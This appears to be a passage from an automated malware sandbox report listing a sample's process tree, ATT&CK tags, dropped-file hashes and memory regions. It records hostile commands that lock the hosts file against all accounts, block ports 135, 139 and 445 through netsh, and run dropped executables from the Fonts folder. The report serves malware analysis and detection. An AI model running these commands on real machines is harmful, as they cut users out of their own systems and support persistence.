                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add filteraction name=BastardsList action=block
                                                                  2⤵
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:2224
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                                  2⤵
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2620
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                  2⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:884
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                  2⤵
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:932
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                  2⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:2868
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                  2⤵
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  PID:900
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                  2⤵
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:1488
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                  2⤵
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3500
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static set policy name=Bastards assign=y
                                                                  2⤵
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:3996
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                  2⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1708
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:3476
                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                    3⤵
                                                                      PID:1588
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2088
                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:636
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1564
                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4080
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:448
                                                                • C:\Windows\SysWOW64\wwgkke.exe
                                                                  C:\Windows\SysWOW64\wwgkke.exe
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:1668
                                                                • C:\Windows\system32\taskeng.exe
                                                                  taskeng.exe {99A9DF63-1F8C-44BA-9ADD-D9D53402E4DC} S-1-5-18:NT AUTHORITY\System:Service:
                                                                  1⤵
                                                                    PID:3852
                                                                    • C:\Windows\system32\cmd.EXE
                                                                      C:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\bzhfhil.exe
                                                                      2⤵
                                                                        PID:584
                                                                        • C:\Windows\Fonts\bzhfhil.exe
                                                                          C:\Windows\Fonts\bzhfhil.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:1724
                                                                      • C:\Windows\system32\cmd.EXE
                                                                        C:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\bzhfhil.exe
                                                                        2⤵
                                                                          PID:2796
                                                                          • C:\Windows\Fonts\bzhfhil.exe
                                                                            C:\Windows\Fonts\bzhfhil.exe
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:3144
                                                                        • C:\Windows\system32\cmd.EXE
                                                                          C:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\bzhfhil.exe
                                                                          2⤵
                                                                            PID:3076
                                                                            • C:\Windows\Fonts\bzhfhil.exe
                                                                              C:\Windows\Fonts\bzhfhil.exe
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:3776
                                                                        • C:\Windows\system32\conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe "-1808208646-760140833-8620587102019862472-2119860805-1748676759-1839143719-1254720930"
                                                                          1⤵
                                                                            PID:2620

                                                                          Network

                                                                          MITRE ATT&CK Enterprise v15

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Windows\SysWOW64\Packet.dll

                                                                            Filesize

                                                                            95KB

                                                                            MD5

                                                                            86316be34481c1ed5b792169312673fd

                                                                            SHA1

                                                                            6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                                            SHA256

                                                                            49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                                            SHA512

                                                                            3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                                          • C:\Windows\SysWOW64\wpcap.dll

                                                                            Filesize

                                                                            275KB

                                                                            MD5

                                                                            4633b298d57014627831ccac89a2c50b

                                                                            SHA1

                                                                            e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                                            SHA256

                                                                            b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                                            SHA512

                                                                            29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                                                          • C:\Windows\TEMP\ngzetecmk\config.json

                                                                            Filesize

                                                                            714B

                                                                            MD5

                                                                            7ee64caf54228be5294e542615bcbd9a

                                                                            SHA1

                                                                            a520fa5cff0dec520231e54d203e512eb3e148f5

                                                                            SHA256

                                                                            9a19e014fdf05b035dd78c383dd41d2346e95a80e63750e4d7ca73b183b19265

                                                                            SHA512

                                                                            7ff2fc1cfddbd563978f6d044e60496d22b7fc481e817a0410f98ef9f4335926db6e1bfb3c7ee18f3644aa9f8062a849f5ea0245a7f5cb82193cbdbce09e26bd

                                                                          • C:\Windows\TEMP\uinyzgkvy\1232.dmp

                                                                            Filesize

                                                                            4.0MB

                                                                            MD5

                                                                            9b81f3a7cdc244b1edb32ee967994f9e

                                                                            SHA1

                                                                            177c570a5ee581a2038d39e2dd0c496980d80b7f

                                                                            SHA256

                                                                            87b1513ca7a4453afddc16220e584de790251d89f0da59b18c1a8d7d16166d30

                                                                            SHA512

                                                                            d6b1348fd3fc0a5740c526bd0c436fede01ab52abc2ffe8f2a3f4957269f770a0250895598e8d821c879bdf9306ddcac84158aa7a315f8f97c185870ecf0a328

                                                                          • C:\Windows\TEMP\uinyzgkvy\1388.dmp

                                                                            Filesize

                                                                            2.1MB

                                                                            MD5

                                                                            475c4714bb89adae5e0fbfa1a23453f4

                                                                            SHA1

                                                                            c36b194aba7261938be3657ca63c931ef257c577

                                                                            SHA256

                                                                            84ea6ab797e647157a757c4991d61aee814bda5da573c8e200719acedab5337d

                                                                            SHA512

                                                                            973a2fae8dc8a767d58a704362bfefca36d29e008b3d7428180871b5f9243a02745cfd013736a312e7eb3fba8eedcaefe071e865e6d67dcb32ddfb1a3dfd55e5

                                                                          • C:\Windows\Temp\amydesk.exe

                                                                            Filesize

                                                                            72KB

                                                                            MD5

                                                                            398fb3fed9be2941f3548a5d0d4b862c

                                                                            SHA1

                                                                            e9c9e3a4be652de36d1b8cc849c8b3c10e130e2f

                                                                            SHA256

                                                                            fe345cc8b133d91a3b0bcbf9db4cbc7cc83d1e4f83c297161f83a4bed1ce6a61

                                                                            SHA512

                                                                            6f406d8d336ead02ff70f9455f070049bb4c923d3d6132381536f5f7e7d67a350b4dea94ad38541be472396fbfe182182f532a51ef37dc491bdbeed477fad29c

                                                                          • C:\Windows\system32\drivers\etc\hosts

                                                                            Filesize

                                                                            975B

                                                                            MD5

                                                                            b5d815ff5310f62de5020591be598bc0

                                                                            SHA1

                                                                            8013562b0cc2516d16d474308c8982a31b7f5dd0

                                                                            SHA256

                                                                            a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85

                                                                            SHA512

                                                                            4e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94

                                                                          • C:\Windows\uinyzgkvy\Corporate\vfshost.exe

                                                                            Filesize

                                                                            381KB

                                                                            MD5

                                                                            fd5efccde59e94eec8bb2735aa577b2b

                                                                            SHA1

                                                                            51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                                            SHA256

                                                                            441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                                                            SHA512

                                                                            74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                                                          • C:\Windows\uinyzgkvy\mmyaykufi\ip.txt

                                                                            Filesize

                                                                            193B

                                                                            MD5

                                                                            40db2b8f778ea873eb6d382cf868b21f

                                                                            SHA1

                                                                            fb4a34dc23d50c9be96a50167d75d65a9c7cb3a9

                                                                            SHA256

                                                                            7cc479b062b3067e40a922987d1025b257569fea61a120d034c0b58f1f61e4d0

                                                                            SHA512

                                                                            136455b08c0406b82def9575649d9e27575b1f9fed0ce00f1b0fc4d75759b7471da1228ddc7b4a14ec68ba5ceb7c1b6596e174cfe1adac48e39e8ce4f494def3

                                                                          • C:\Windows\uinyzgkvy\mmyaykufi\nybnimkby.exe

                                                                            Filesize

                                                                            63KB

                                                                            MD5

                                                                            821ea58e3e9b6539ff0affd40e59f962

                                                                            SHA1

                                                                            635a301d847f3a2e85f21f7ee12add7692873569

                                                                            SHA256

                                                                            a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb

                                                                            SHA512

                                                                            0d08235781b81ff9e0a75f0e220a8d368d95ee75bf482670e83696e59d991aad68310ae7fa677ac96ffad1f97b3ec7d7208dc26d2edb111c39213b32502b82f6

                                                                          • C:\Windows\uinyzgkvy\mmyaykufi\scan.bat

                                                                            Filesize

                                                                            158B

                                                                            MD5

                                                                            fd0d09d1b8a43fdb20ff8dc018addd74

                                                                            SHA1

                                                                            6cc5cea8395ec4b03380a645eeab14cf15783952

                                                                            SHA256

                                                                            b48d113497236f5d12865148a8c9f68732f8b75142ac9bef987d90d0d1e5b182

                                                                            SHA512

                                                                            3de607d45b039a26c60ada6c2777a12b1ecf0272a630062e5b4812034389ce1417de5b9de19f9c22ce16a6ee0b3b596ba84cb64469b978f3c830706d5b3e065a

                                                                          • \Windows\Temp\ngzetecmk\ktikni.exe

                                                                            Filesize

                                                                            820KB

                                                                            MD5

                                                                            6ef68c9b73b1beee2efabaf6dfe11051

                                                                            SHA1

                                                                            a7433bc216bf4d50994c91beffdd93ca0947a396

                                                                            SHA256

                                                                            ea71d8f5e0f511e5c82de4e50bf9def4f50817a0f7a5a1ba32027b806850aab0

                                                                            SHA512

                                                                            dc7193353e928178549e85544bd498e4ca6dd57fe4e53216ac1931af6938c23f5afce7a9b7d2510e4b9722c2e334ddb8242921c5cbb49288bc2cc300ee21e46c

                                                                          • \Windows\Temp\nseB1A.tmp\System.dll

                                                                            Filesize

                                                                            11KB

                                                                            MD5

                                                                            2ae993a2ffec0c137eb51c8832691bcb

                                                                            SHA1

                                                                            98e0b37b7c14890f8a599f35678af5e9435906e1

                                                                            SHA256

                                                                            681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                                                            SHA512

                                                                            2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                                                          • \Windows\Temp\nseB1A.tmp\nsExec.dll

                                                                            Filesize

                                                                            6KB

                                                                            MD5

                                                                            b648c78981c02c434d6a04d4422a6198

                                                                            SHA1

                                                                            74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                                                            SHA256

                                                                            3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                                                            SHA512

                                                                            219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                                                          • \Windows\Temp\uinyzgkvy\igteyvken.exe

                                                                            Filesize

                                                                            126KB

                                                                            MD5

                                                                            e8d45731654929413d79b3818d6a5011

                                                                            SHA1

                                                                            23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                                            SHA256

                                                                            a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                                            SHA512

                                                                            df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                                                          • \Windows\lgrebuee\bzhfhil.exe

                                                                            Filesize

                                                                            8.1MB

                                                                            MD5

                                                                            3239e58dc9df6fb3e11f2c4a1522073a

                                                                            SHA1

                                                                            47cbb231afdf51511f743b0448ecc3e011fbf56b

                                                                            SHA256

                                                                            b0e7eada2df0d9ab60df9c9bccb6e0aeb065f2769045747e4e55e88100aafa5a

                                                                            SHA512

                                                                            a9ee69be174003b668c8917bc0783fb0e1ff92f1c66b06d6cacfba7015575dc60cb77caa63f3fc207b35114758540ddbecbecf0d94fc3669f77d75105a280aa2

                                                                          • \Windows\lgrebuee\kkjdjklygizuerj27118.exe

                                                                            Filesize

                                                                            68KB

                                                                            MD5

                                                                            8a75b0ef65cd434e12598d6d656e89a7

                                                                            SHA1

                                                                            92ac075ced9909b1f23416c881e924b0857d57cc

                                                                            SHA256

                                                                            a992fbd89c34c1aa8f7dc51aaa8c6b3f1bbada7c2394377c5b95d51ad7dd4501

                                                                            SHA512

                                                                            68931b61ac0c0673e2669934dfaa4b61daed5f5f2b7500215b133840de32f36e352e6a3af576539fd8e350b167130d558c9455120a143d595b2361921aaf5161

                                                                          • \Windows\uinyzgkvy\mmyaykufi\iybtmbhuy.exe

                                                                            Filesize

                                                                            332KB

                                                                            MD5

                                                                            ea774c81fe7b5d9708caa278cf3f3c68

                                                                            SHA1

                                                                            fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                                            SHA256

                                                                            4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                                            SHA512

                                                                            7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                                                          • \Windows\uinyzgkvy\mmyaykufi\wpcap.exe

                                                                            Filesize

                                                                            424KB

                                                                            MD5

                                                                            e9c001647c67e12666f27f9984778ad6

                                                                            SHA1

                                                                            51961af0a52a2cc3ff2c4149f8d7011490051977

                                                                            SHA256

                                                                            7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                                            SHA512

                                                                            56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                                                          • memory/524-163-0x000000013FE20000-0x000000013FF0E000-memory.dmp

                                                                            Filesize

                                                                            952KB

                                                                          • memory/524-148-0x000000013FE20000-0x000000013FF0E000-memory.dmp

                                                                            Filesize

                                                                            952KB

                                                                          • memory/1292-215-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/1292-221-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/1292-253-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/1292-250-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/1292-249-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/1292-193-0x00000000002E0000-0x00000000002F0000-memory.dmp

                                                                            Filesize

                                                                            64KB

                                                                          • memory/1292-233-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/1292-232-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/1292-231-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/1292-216-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/1292-226-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/1292-218-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/1292-188-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/1292-223-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/1292-222-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/1400-158-0x0000000000260000-0x0000000000272000-memory.dmp

                                                                            Filesize

                                                                            72KB

                                                                          • memory/2024-0-0x0000000000400000-0x0000000000ABA000-memory.dmp

                                                                            Filesize

                                                                            6.7MB

                                                                          • memory/2024-4-0x0000000000400000-0x0000000000ABA000-memory.dmp

                                                                            Filesize

                                                                            6.7MB

                                                                          • memory/2208-146-0x0000000000FD0000-0x00000000010BE000-memory.dmp

                                                                            Filesize

                                                                            952KB

                                                                          • memory/2208-143-0x0000000000FD0000-0x00000000010BE000-memory.dmp

                                                                            Filesize

                                                                            952KB

                                                                          • memory/2216-176-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                            Filesize

                                                                            72KB

                                                                          • memory/2216-159-0x0000000010000000-0x0000000010008000-memory.dmp

                                                                            Filesize

                                                                            32KB

                                                                          • memory/2328-169-0x000000013F8B0000-0x000000013F90B000-memory.dmp

                                                                            Filesize

                                                                            364KB

                                                                          • memory/2328-139-0x000000013F8B0000-0x000000013F90B000-memory.dmp

                                                                            Filesize

                                                                            364KB

                                                                          • memory/2428-157-0x0000000000330000-0x0000000000342000-memory.dmp

                                                                            Filesize

                                                                            72KB

                                                                          • memory/2768-9-0x0000000000400000-0x0000000000ABA000-memory.dmp

                                                                            Filesize

                                                                            6.7MB

                                                                          • memory/2808-26-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                            Filesize

                                                                            396KB

                                                                          • memory/2808-23-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                            Filesize

                                                                            396KB

                                                                          • memory/2812-213-0x000000013F7E0000-0x000000013F83B000-memory.dmp

                                                                            Filesize

                                                                            364KB

                                                                          • memory/2812-214-0x000000013F7E0000-0x000000013F83B000-memory.dmp

                                                                            Filesize

                                                                            364KB

                                                                          • memory/2908-185-0x0000000002DF0000-0x00000000033AE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/2908-205-0x0000000001A40000-0x0000000001A9B000-memory.dmp

                                                                            Filesize

                                                                            364KB

                                                                          • memory/2908-144-0x0000000001880000-0x00000000018E3000-memory.dmp

                                                                            Filesize

                                                                            396KB

                                                                          • memory/2908-207-0x0000000002DF0000-0x00000000033AE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/2908-138-0x00000000019C0000-0x0000000001A1B000-memory.dmp

                                                                            Filesize

                                                                            364KB

                                                                          • memory/2908-189-0x0000000001A40000-0x0000000001A9B000-memory.dmp

                                                                            Filesize

                                                                            364KB

                                                                          • memory/2908-217-0x0000000001A40000-0x0000000001A9B000-memory.dmp

                                                                            Filesize

                                                                            364KB

                                                                          • memory/2908-183-0x0000000002DF0000-0x00000000033AE000-memory.dmp

                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/2908-220-0x0000000001A40000-0x0000000001A9B000-memory.dmp

                                                                            Filesize

                                                                            364KB

                                                                          • memory/2908-212-0x0000000001A40000-0x0000000001A9B000-memory.dmp

                                                                            Filesize

                                                                            364KB

                                                                          • memory/2908-22-0x0000000001880000-0x00000000018E3000-memory.dmp

                                                                            Filesize

                                                                            396KB

                                                                          • memory/2908-145-0x0000000001880000-0x00000000018E3000-memory.dmp

                                                                            Filesize

                                                                            396KB

                                                                          • memory/2908-21-0x0000000001880000-0x00000000018E3000-memory.dmp

                                                                            Filesize

                                                                            396KB

                                                                          • memory/2908-191-0x00000000019C0000-0x0000000001A1B000-memory.dmp

                                                                            Filesize

                                                                            364KB

                                                                          • memory/3004-206-0x000000013F1A0000-0x000000013F1FB000-memory.dmp

                                                                            Filesize

                                                                            364KB

                                                                          • memory/3004-208-0x000000013F1A0000-0x000000013F1FB000-memory.dmp

                                                                            Filesize

                                                                            364KB

                                                                          • memory/3024-91-0x0000000000080000-0x00000000000CC000-memory.dmp

                                                                            Filesize

                                                                            304KB

                                                                          • memory/3120-196-0x000000013FC70000-0x000000013FCCB000-memory.dmp

                                                                            Filesize

                                                                            364KB

                                                                          • memory/3120-192-0x000000013FC70000-0x000000013FCCB000-memory.dmp

                                                                            Filesize

                                                                            364KB